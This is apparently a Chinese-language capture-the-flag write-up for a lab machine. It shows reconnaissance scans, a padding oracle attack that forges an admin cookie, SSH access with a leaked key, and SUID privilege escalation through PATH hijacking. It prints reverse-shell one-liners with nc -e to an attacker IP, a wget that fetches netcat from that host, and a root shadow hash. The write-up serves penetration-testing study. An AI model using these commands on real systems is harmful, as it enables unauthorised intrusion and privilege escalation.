22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 e1:92:1b:48:f8:9b:63:96:d4:e5:7a:40:5f:a4:c8:33 (DSA)
|   2048 af:a0:0f:26:cd:1a:b5:1f:a7:ec:40:94:ef:3c:81:5f (RSA)
|   256 11:a3:2f:25:73:67:af:70:18:56:fe:a2:e3:54:81:e8 (ECDSA)
|_  256 96:81:9c:f4:b7:bc:1a:73:05:ea:ba:41:35:a4:66:b7 (ED25519)
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: CompanyDev
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

web

nikto

nikto -h 10.10.10.18

Apache/2.4.7 (Ubuntu)
PHP/5.5.9-1ubuntu4.21

经过检查，web目录十分干净，只有少数的功能。

• 注册用户功能，检查sql注入

wapita

wapiti -u http://10.10.10.18/login.php
wapiti -u http://10.10.10.18/register.php
wapiti -u  http://10.10.10.18/classes/

扫描，无漏洞

gobuster

gobuster -u http://10.10.10.18 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

http://10.10.10.18/classes/

发现目录遍历，该目录下有几个php文件。auth.php跳转到admin/login.php

用burp拦截，发现302跳转，404not found =》admin/login.php

这让我不禁想到，login.php是否可以登陆admin

admin/admin尝试登陆，提示Invalid credentials，爆破失败

ssh

• 检查openssh是否有低版本漏洞

ssh root@10.10.10.18

The authenticity of host '10.10.10.18 (10.10.10.18)' can't be established.
ECDSA key fingerprint is SHA256:OJ5DTyZUGZXEpX4BKFNTApa88gR/+w5vcNathKIPcWE.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '10.10.10.18' (ECDSA) to the list of known hosts.
root@10.10.10.18: Permission denied (publickey).

python ssh.py --userList /usr/share/wordlists/linux-user.txt 10.10.10.18 --outputFile /root/Desktop/users.txt

检查结果：公钥私钥登陆方式，好像不允许私钥登陆

• 检查中间件漏洞
  Apache + PHP < 5.3.12 / < 5.4.2 - cgi-bin Remote Code Execution + Scanner | exploits/php/remote/29316.py

cgi-bin目录不存在，所以漏洞不存在

writeup

参考资料： Padding Oracle Attack 笔记

Padding Oracle Attack，简要的说就是密码学配置不当，会导致任意文件读取。

工具：wget https://raw.githubusercontent.com/GDSSecurity/PadBuster/master/padBuster.pl

使用burp抓包，获取Cookie。

数据包

GET / HTTP/1.1

Host: 10.10.10.18

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Cookie: PHPSESSID=l8g93fl443iinu6cndl71g1ic5; auth=zZs1CucXwORHrUD2uEkfi7HKtO4MqN0e

Connection: close

Upgrade-Insecure-Requests: 1

Cache-Control: max-age=0

padBuster.pl

Use: padBuster.pl URL EncryptedSample BlockSize [options]

Padding Oracle -- 填充oracle解密：
perl padBuster.pl http://10.10.10.18 zZs1CucXwORHrUD2uEkfi7HKtO4MqN0e -cookies auth=zZs1CucXwORHrUD2uEkfi7HKtO4MqN0e 8 -encoding 0

填充oracle加密
perl padBuster.pl http://10.10.10.18 zZs1CucXwORHrUD2uEkfi7HKtO4MqN0e -cookies auth=zZs1CucXwORHrUD2uEkfi7HKtO4MqN0e 8 -encoding 0 -plaintext user=admin

当获得admin加密后，获得了cookies字符串。用burp修改包。

访问/mysshkeywithnamemitsos

将密钥保存为一个名为id_rsa的文件。

chmod 400 id_rsa
ssh -i id_rsa mitsos@10.10.10.18

INFO

家目录下有一个suid权限的elf程序。尝试用john破解/etc/shadow，失败。

mitsos@LazyClown:~$ ls -al backup
-rwsrwsr-x 1 root root 7303 May  3  2017 backup

mitsos@LazyClown:~$ file backup
backup: setuid, setgid ELF 32-bit LSB  executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, BuildID[sha1]=33d6b5bec96c44e630f37ff41cc1c4a8b2813b6b, not stripped

一下就是/etc/shadow的第一行
root:$6$v1daFgo/$.7m9WXOoE4CKFdWvC.8A9aaQ334avEU8KHTmhjjGXMl0CTvZqRfNM5NO2/.7n2WtC58IUOMvLjHL0j4OsDPuL0:17288:0:99999:7:::

复制第一个冒号和第二个冒号之间的字符串，就是密文。将密文保存为文件名pass
$6$v1daFgo/$.7m9WXOoE4CKFdWvC.8A9aaQ334avEU8KHTmhjjGXMl0CTvZqRfNM5NO2/.7n2WtC58IUOMvLjHL0j4OsDPuL0

---
john --wordlist=/usr/share/john/password.lst ./pass
解密失败
---

strings backup

上传nc

mitsos@LazyClown:~$whereis nc
/bin/nc

尝试nc反弹shell，结果netcat-openbsd package，不支持-e参数。
mitsos@LazyClown:~$/bin/nc -e /bin/sh 10.10.14.7 1122


于是上传一个nc
wget http://10.10.14.7/netcat;chmod a+x netcat

/home/mitsos/netcat -h 
/home/mitsos/netcat -e /bin/sh 10.10.14.7 1122

---
第一次上传的64位nc,提示出错
-bash: /home/mitsos/nc: cannot execute binary file: Exec format error
于是再次上传32位nc
---
uname -a
Linux LazyClown 4.4.0-31-generic #50~14.04.1-Ubuntu SMP Wed Jul 13 01:06:37 UTC 2016 i686 i686 i686 GNU/Linux

i686说明是32位的系统版本

成功反弹shell

提权

新建cat文件，内容是shell脚本。当suid程序执行cat /etc/shadow，加入环境变量后，会先执行以下脚本。

#!/bin/sh
more /root/root.txt > /home/mitsos/root.txt

添加环境变量export PATH=.:$PATH；chmod +x cat，给/home/mitsos/cat添加执行权限。

运行/backup，发现root.txt已经复制到该目录。但是查看一下，发现还是root权限可读。

#!/bin/bash
more chmod a+r /home/mitsos/root.txt

修改cat，然后再次运行backup即可获得root.txt的内容

方法二：

cat 内容为

#!/bin/bash
/home/mitsos/netcat -e /bin/bash 10.10.14.7 1233

即可获得一个root shell

总结

学习到了一种新的suid提权方式，虽然有suid权限的elf程序不nmap|vim|find|bash|more|less|nano|cp这些程序其中的任何一种，但是通过添加环境变量，可以顺带执行shell脚本。

这个突破防线的方式，通过伪造cookies，是由于密码算法使用不当，导致攻击者可以猜测出admin的cookies，从而登陆web。

Padding Oracle Attack，利用条件很苛刻。

也许是我对密码学的东西知之甚少。不知道在实际攻击过程中，这种方式是否常见。